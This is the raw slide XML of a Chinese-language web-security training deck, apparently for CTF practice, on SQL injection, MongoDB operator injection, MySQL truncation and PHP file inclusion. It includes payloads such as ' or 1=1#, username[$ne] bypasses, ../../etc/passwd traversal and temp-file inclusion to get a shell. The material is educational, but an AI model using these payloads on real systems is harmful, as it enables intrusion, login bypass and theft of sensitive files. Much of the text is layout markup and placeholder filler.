admin（查询成功）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2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d=123 union select 1,2,3,4,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*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 from admin（查询成功）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step2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inner join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查询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2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id=123 union select 1,2,3,4,* from (admin as a inner join admin as b on a.id = b.id)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万能密码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select * from admin where username='{$user}' and password='{$pass}'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$user = ' or 1=1#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select * from admin where username='' or 1=1#' and .......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构造永真条件，得到查询条目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万能密码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构造永真条件，得到查询条目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利用数据库的变量类型转换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SELECT * FROM users where name='root' | 'a'#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SELECT * FROM users  where username='a'=0#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SELECT * FROM users  where username=' '*' '#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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Mongodb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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username[$ne]=test&amp;password[$ne]=test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db.test.find({username:{'$ne':'test'}},password:{'$ne','test'});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等价于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select * from test where username!='test' and password!='test'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username[$regex]=/^ADMIN/&amp;password[$ne]=a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db.test.find({username:{'$regex':'^a'}},password:{'$ne','test'});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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一种隐蔽的注入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12570"/>
            <a:ext cx="6026785" cy="4255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90105" y="2743200"/>
            <a:ext cx="356743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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>字符串被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MYSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>当成八字节的DOUBEL类型来处理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一种隐蔽的注入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思路就是将查询内容转成数字进行运算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" y="2447925"/>
            <a:ext cx="6132195" cy="1963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380" y="2447925"/>
            <a:ext cx="6807200" cy="19627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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一种隐蔽的注入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思路就是将查询内容转成数字进行运算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select conv(hex(substr((select table_name from information_schema.tables where table_schema=schema() limit 0,1),1 + (n-1) * 8, 8*n)), 16, 10);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990" y="4195445"/>
            <a:ext cx="8001000" cy="21609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39560" y="5232400"/>
            <a:ext cx="35674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超过</a:t>
            </a:r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zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个字节就会是无符号整形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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一种隐蔽的注入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insert into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news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 values ('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', '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'|conv(hex(substr(user(),1 + (n-1) * 8, 8* n)),16, 10);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5" y="3252470"/>
            <a:ext cx="8512175" cy="2421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40" y="3252470"/>
            <a:ext cx="5032375" cy="24371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Mysql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过长截断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在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MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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没有开启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STRICT_ALL_TABLES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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选项时（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MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern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sql_mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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默认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern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defalut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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）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,MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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对插入超长的值只会提示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'warning'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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并且插入成功，而不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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，这样会导致一些截断问题。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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新建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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一张表测试，表的结构</a:t>
            </a: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如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800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8606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Create table user(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id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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tinyint</a:t>
            </a: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(4) not null,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username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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varchar</a:t>
            </a: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(7) not null,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password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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varchar</a:t>
            </a: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(20) not null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8606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)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800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sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0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Mysql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过长截断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开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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strict_trans_tables</a:t>
            </a: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后插入过长条目失败，关闭后插入成功</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800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sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0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510" y="2199005"/>
            <a:ext cx="6969125" cy="2113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510" y="4312285"/>
            <a:ext cx="6000750" cy="21812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2437"/>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="284D7A"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0F243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098" name="任意多边形 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1782763" y="0"/>
            <a:ext cx="3582987" cy="1990725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 3582460"/>
              <a:gd name="txT" fmla="*/ 0 h 1991022"/>
              <a:gd name="txR" fmla="*/ 3582460 w 3582460"/>
              <a:gd name="txB" fmla="*/ 1991022 h 1991022"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="3328710" y="1990131"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="255333" y="1990131"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1543474"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="882324" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2701718" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="3584041" y="1543474"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB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9" name="任意多边形 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="1990725"/>
            <a:ext cx="2484438" cy="3089275"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 2483870"/>
              <a:gd name="txT" fmla="*/ 0 h 3088328"/>
              <a:gd name="txR" fmla="*/ 2483870 w 2483870"/>
              <a:gd name="txB" fmla="*/ 3088328 h 3088328"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="2485574" y="3091170"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="882540" y="3091170"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1545586"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="882540" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2485574" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB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0" name="任意多边形 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2065338" y="4154488"/>
            <a:ext cx="4710112" cy="2703512"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 4711161"/>
              <a:gd name="txT" fmla="*/ 0 h 2702918"/>
              <a:gd name="txR" fmla="*/ 4711161 w 4711161"/>
              <a:gd name="txB" fmla="*/ 2702918 h 2702918"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="3548990" y="2704700"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1159025" y="2704700"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="672689"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="383691" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="4324326" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="4708012" y="672689"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB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1" name="文本框 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3651250" y="4822825"/>
            <a:ext cx="1539875" cy="1862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1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284D7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sz="11500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="284D7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2" name="文本框 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750050" y="2587625"/>
            <a:ext cx="3100070" cy="7156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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000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4103" name="文本框 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7327900" y="3406775"/>
            <a:ext cx="1205230" cy="7988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4104" name="直接连接符 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8939213" y="1704975"/>
            <a:ext cx="0" cy="3598863"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="EBEDEC">
                <a:alpha val="50195"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:bevel/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="XCTFb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Mysql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过长截断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插入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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username</a:t>
            </a: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变成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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'admin'</a:t>
            </a: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。（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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trim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800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sym typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0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如果网站仅通过用户名标识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管理员，导致攻击者可以重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复注册管理员，越权访问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060" y="2341245"/>
            <a:ext cx="5952490" cy="42392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任意多边形 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1782763" y="0"/>
            <a:ext cx="3582987" cy="1990725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 3582460"/>
              <a:gd name="txT" fmla="*/ 0 h 1991022"/>
              <a:gd name="txR" fmla="*/ 3582460 w 3582460"/>
              <a:gd name="txB" fmla="*/ 1991022 h 1991022"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="3328710" y="1990131"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="255333" y="1990131"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1543474"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="882324" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2701718" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="3584041" y="1543474"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB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9" name="任意多边形 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="0" y="1990725"/>
            <a:ext cx="2484438" cy="3089275"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 2483870"/>
              <a:gd name="txT" fmla="*/ 0 h 3088328"/>
              <a:gd name="txR" fmla="*/ 2483870 w 2483870"/>
              <a:gd name="txB" fmla="*/ 3088328 h 3088328"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="2485574" y="3091170"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="882540" y="3091170"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1545586"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="882540" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2485574" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB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0" name="任意多边形 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2065338" y="4154488"/>
            <a:ext cx="4710112" cy="2703512"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 4711161"/>
              <a:gd name="txT" fmla="*/ 0 h 2702918"/>
              <a:gd name="txR" fmla="*/ 4711161 w 4711161"/>
              <a:gd name="txB" fmla="*/ 2702918 h 2702918"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="3548990" y="2704700"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1159025" y="2704700"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="672689"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="383691" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="4324326" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="4708012" y="672689"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB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1" name="文本框 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3651250" y="4822825"/>
            <a:ext cx="1717675" cy="1862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1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284D7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sz="11500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="284D7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222" name="文本框 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750050" y="2587625"/>
            <a:ext cx="5405755" cy="7010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chemeClr val="bg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File Inclusion Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000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9223" name="文本框 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7327900" y="3406775"/>
            <a:ext cx="3368675" cy="1139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Click here to add  you to the  center of the  narrative </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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Thought  Click here to add   you to the  center of the </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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                             narrative thought</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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9224" name="直接连接符 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8939213" y="1704975"/>
            <a:ext cx="0" cy="3598863"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="EBEDEC">
                <a:alpha val="50195"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:bevel/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="XCTFb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在WEB开发中为什么要使用本地文件包含，它有什么作用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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banner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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cs typeface="Courier New" panose="02070309020205020404"/>
                <a:sym typeface="Courier New" panose="02070309020205020404"/>
              </a:rPr>
              <a:t>header</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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cs typeface="Courier New" panose="02070309020205020404"/>
                <a:sym typeface="Courier New" panose="02070309020205020404"/>
              </a:rPr>
              <a:t>预处理函数、配置文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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缓存</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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提高了代码的重用性，加快了开发速度</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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文件包含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常见函数：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 b="1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include</a:t>
            </a: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r>
              <a:rPr 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：执行到</a:t>
            </a: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include</a:t>
            </a:r>
            <a:r>
              <a:rPr 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时才包含文件，找不到被包含文件时只会产生警告，脚本将继续执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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require()：只要程序一运行就包含文件，找不到被包含的文件时会产生致命错误，并停止脚本</a:t>
            </a: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include_once()</a:t>
            </a:r>
            <a:r>
              <a:rPr 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和</a:t>
            </a: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require_once()</a:t>
            </a:r>
            <a:r>
              <a:rPr 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：若文件中代码已被包含则不会再次包含</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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文件包含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+mn-ea"/>
              </a:rPr>
              <a:t>php文件包含：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="E3D2D2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微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>不管文件格式如何,如果里面的内容是php，则内容会被当成php执行,不是php则会读取到文件内容(用来读取/etc/passw等等配置文件的敏感信息)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="E3D2D2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+mn-ea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sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1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&lt;?php include($_GET['file']); ?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1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包括本地文件包含（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LFI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）和远程文件包含（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RFI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 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2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+mn-ea"/>
              </a:rPr>
              <a:t>读取敏感文件：</a:t>
            </a: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微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>file=../../../../etc/passwd</a:t>
            </a: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微软雅黑" panose="020B0503020204020204" charset="-122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微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>&lt;?php include('../../../../etc/passwd'); ?&gt;</a:t>
            </a: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微软雅黑" panose="020B0503020204020204" charset="-122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微软雅黑" panose="020B0503020204020204" charset="-122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微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>包含一句话木马文件getshell：</a:t>
            </a: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微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>包含日志文件getshell</a:t>
            </a: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微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>http://www.test.com/view.php?page=../../../../proc/self/environ，利用/proc/self/environ进行包含</a:t>
            </a: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微软雅黑" panose="020B0503020204020204" charset="-122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sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EBEEF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EBEEF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+mn-ea"/>
              </a:rPr>
              <a:t>包含临时文件（条件竞争）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LFI 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720090"/>
            <a:ext cx="10515600" cy="54571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FFFFFF"/>
                </a:highlight>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>以上传文件的方式请求任意PHP文件，服务器都会创建临时文件来保存文件内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1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FFFFFF"/>
                </a:highlight>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其中PHP引擎对enctype=”multipart/form-data”这种请求的处理过程如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求到达</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>创建临时文件，并写入上传文件的内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight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FFFFFF"/>
                </a:highlight>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>调用相应PHP脚本进行处理，如校验名称、大小等；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="91440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bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>删除临时文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight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2121" name="Shape 21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398905" y="1503915"/>
            <a:ext cx="8012674" cy="18617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700405"/>
            <a:ext cx="10515600" cy="54571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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对上传产生的临时文件的处理：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight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2128" name="Shape 21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332230" y="1359535"/>
            <a:ext cx="7498080" cy="48177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700405"/>
            <a:ext cx="10515600" cy="54571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如何获取临时文件名？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phpinfo()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，当向任意php文件post请求上传数据时，可以直接在phpinfo页面找到临时文件的路径及名字。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包含临时文件，执行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命令，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getshell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2135" name="Shape 213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080000" y="894715"/>
            <a:ext cx="6648450" cy="26885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700405"/>
            <a:ext cx="10515600" cy="54571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难点：临时文件生存周期极短，如何延长？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分块传输编码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通过分块传输编码，提前获知临时文件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名称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通过增加临时文件名后数据长度来延长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时间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通过大量请求来延迟PHP脚本的执行速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度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425" y="1465580"/>
            <a:ext cx="4636770" cy="48907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2437"/>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="284D7A"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0F243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14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322263" y="881063"/>
            <a:ext cx="11552237" cy="5568950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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文本框 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3824288" y="114300"/>
            <a:ext cx="454818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MORE  THEN  TEMPLATE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1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44" name="燕尾形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2114550" y="3703638"/>
            <a:ext cx="477838" cy="563562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燕尾形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2030413" y="3946525"/>
            <a:ext cx="642937" cy="75565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任意多边形 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="1368425" y="1984375"/>
            <a:ext cx="1963738" cy="1528763"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="txL" fmla="*/ 0 w 1964209"/>
              <a:gd name="txT" fmla="*/ 0 h 1529279"/>
              <a:gd name="txR" fmla="*/ 1964209 w 1964209"/>
              <a:gd name="txB" fmla="*/ 1529279 h 1529279"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="1962793" y="763865"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1198706" y="1527728"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="1525706"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="1527727"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1527727"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="1185039"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="1185039"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="1183924"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1173318" y="1185040"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1594619" y="763865"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1173318" y="342687"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="343804"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1162247" y="342687"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="342687"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1178625" y="2024"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1198706" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="1962793" y="763865"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="1964209" h="1529279">
                <a:moveTo>
                  <a:pt x="1964209" y="764640"/>
                </a:moveTo>
                <a:cubicBezTo>
